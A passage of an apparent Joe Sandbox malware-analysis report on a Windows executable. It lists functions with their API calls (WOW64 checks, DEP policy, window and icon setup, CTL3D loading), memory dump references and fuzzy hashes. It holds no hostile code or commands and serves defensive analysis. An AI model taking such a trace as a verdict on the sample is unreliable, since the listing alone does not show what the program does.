                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                                                                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2230631259-2623177817
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a56589ab7a1b006cd470a658b4e564a4f23d6d600cc10ba5a87b0db1f3264359
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a56589ab7a1b006cd470a658b4e564a4f23d6d600cc10ba5a87b0db1f3264359
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 579 406334-40634e GetModuleHandleA GetProcAddress 580 406350 579->580 581 406357-406364 GetProcAddress 579->581 580->581 582 406366 581->582 583 40636d-40637a GetProcAddress 581->583 582->583 584 406380-406381 583->584 585 40637c-40637e SetProcessDEPPolicy 583->585 585->584
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cd4185a27ce8851c2c4b7d70bb489524718637a7134b80680d40cb79fffcc297
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd4185a27ce8851c2c4b7d70bb489524718637a7134b80680d40cb79fffcc297
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 183575631-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 29f65a429a87c8cb7d66797b58bdb8af9e2caa2845e7608b1c03cb4cac835ca6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29f65a429a87c8cb7d66797b58bdb8af9e2caa2845e7608b1c03cb4cac835ca6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0047828C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 614 47828c-4782b4 GetModuleHandleA GetProcAddress 615 4782b6-4782c6 call 403738 GetFileAttributesA 614->615 616 478322-478326 call 403494 614->616 615->616 621 4782c8-4782ca 615->621 620 47832b-478335 616->620 622 4782d3 621->622 623 4782cc-4782d1 621->623 624 4782d5-4782f2 call 403738 CreateFileA 622->624 623->624 624->616 627 4782f4-47830d GetFinalPathNameByHandleA CloseHandle 624->627 627->616 628 47830f-478315 627->628 628->616 629 478317-478320 call 4781b4 628->629 629->620
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004782E8
                                                                                                                                                                                                                                                                                                                                                                  • GetFinalPathNameByHandleA.KERNELBASE(00000000,?,00001000,00000000,00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC), ref: 00478301
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Handle$File$AddressAttributesCloseCreateFinalModuleNamePathProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 873032407-2318956294
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b7da7a124424d5cacaca83f999ecaf76e7f5cdcc60deb679019968f5c2a89327
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7da7a124424d5cacaca83f999ecaf76e7f5cdcc60deb679019968f5c2a89327
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004531DC Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 590a72199e55668467d6112f9e57f701d07af2651b2519b3ef49fb4686bc15e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 590a72199e55668467d6112f9e57f701d07af2651b2519b3ef49fb4686bc15e5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00430950 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                                                                                                                                                                                                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4130936913-2943970505
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                                                                                                                                                                                                                                  • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                                                                                                                                                                                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 2$MAINICON
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3935243913-3181700818
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                                                                                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
